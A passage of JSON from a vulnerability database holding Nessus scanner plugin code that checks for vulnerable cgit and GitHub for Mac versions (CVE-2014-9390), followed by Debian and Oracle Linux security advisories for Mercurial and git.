value:\"p-cpe:/a:novell:opensuse:cgit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cgit-0.11.2-11.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cgit-debuginfo-0.11.2-11.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cgit-debugsource-0.11.2-11.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cgit-0.11.2-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cgit-debuginfo-0.11.2-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cgit-debugsource-0.11.2-13.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cgit / cgit-debuginfo / cgit-debugsource\");\n}\n", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:30:06", "description": "The remote Mac OS X host has a version of GitHub prior to 194\ninstalled. It is, therefore, affected by a remote command execution\nvulnerability when processing git trees in a case-insensitive or\ncase-normalizing file system. A remote attacker, using a specially\ncrafted git tree, can overwrite a user's '.git/config' file when the\nuser clones or checks out a repository, allowing arbitrary command\nexecution.", "edition": 15, "published": "2014-12-23T00:00:00", "title": "GitHub < 1.9.4 .git/config Command Execution (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:github:github", "cpe:/a:git:git"], "id": "MACOSX_GITHUB_194.NASL", "href": "https://www.tenable.com/plugins/nessus/80220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80220);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n\n script_name(english:\"GitHub < 1.9.4 .git/config Command Execution (Mac OS X)\");\n script_summary(english:\"Checks the version of GitHub.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application installed that is affected by a\nremote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of GitHub prior to 194\ninstalled. It is, therefore, affected by a remote command execution\nvulnerability when processing git trees in a case-insensitive or\ncase-normalizing file system. 
A remote attacker, using a specially\ncrafted git tree, can overwrite a user's '.git/config' file when the\nuser clones or checks out a repository, allowing arbitrary command\nexecution.\");\n # https://github.com/blog/1938-vulnerability-announced-update-your-git-clients\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad68bb83\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.linux.kernel/1853266\");\n # http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?afc47628\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.9.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:github:github\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git:git\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_github_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/GitHub\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nappname = \"GitHub\";\n\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\npath = install[\"path\"];\nver = install[\"version\"];\n\nfix = '194';\n\n# Versions are sequential. ver_compare() may be a little\n# silly for a single node, but it works.\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(port:0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, ver, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:15:57", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "Package : mercurial\nVersion : 1.6.4-1+deb6u1\nCVE ID : CVE-2014-9390 CVE-2014-9462\n\nCVE-2014-9462\n\n Jesse Hertz of Matasano Security discovered that Mercurial, a\n distributed version control system, is prone to a command injection\n vulnerability via a crafted repository name in a clone command.\n\nCVE-2014-9390\n\n is a security vulnerability that affects mercurial repositories in a\n case-insensitive filesystem (eg. VFAT or HFS+). It allows for remote\n code execution of a specially crafted repository. 
This is less\n severe for the average Debian installation as they are usually set\n up with case-sensitive filesystems.\n\n\n", "edition": 7, "modified": "2015-06-04T07:25:25", "published": "2015-06-04T07:25:25", "id": "DEBIAN:DLA-237-1:BBA66", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00001.html", "title": "[SECURITY] [DLA 237-1] mercurial security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T00:51:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3257-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMay 11, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mercurial\nCVE ID : CVE-2014-9462\nDebian Bug : 783237\n\nJesse Hertz of Matasano Security discovered that Mercurial, a\ndistributed version control system, is prone to a command injection\nvulnerability via a crafted repository name in a clone command.\n\nFor the oldstable distribution (wheezy), this problem has been fixed in\nversion 2.2.2-4+deb7u1. 
This update also includes a fix for\nCVE-2014-9390 previously scheduled for the next wheezy point release.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 3.1.2-2+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.4-1.\n\nWe recommend that you upgrade your mercurial packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2015-05-11T20:05:43", "published": "2015-05-11T20:05:43", "id": "DEBIAN:DSA-3257-1:168E5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00146.html", "title": "[SECURITY] [DSA 3257-1] mercurial security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:21", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390", "CVE-2015-7545"], "description": "[1.9.4-3.1]\n- fix arbitrary code execution via crafted URLs\n Resolves: #1273889\n[1.9.4-3]\n- fix CVE-2014-9390\n Resolves: rhbz#1220552", "edition": 4, "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-2515", "href": "http://linux.oracle.com/errata/ELSA-2015-2515.html", "title": "git19-git security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}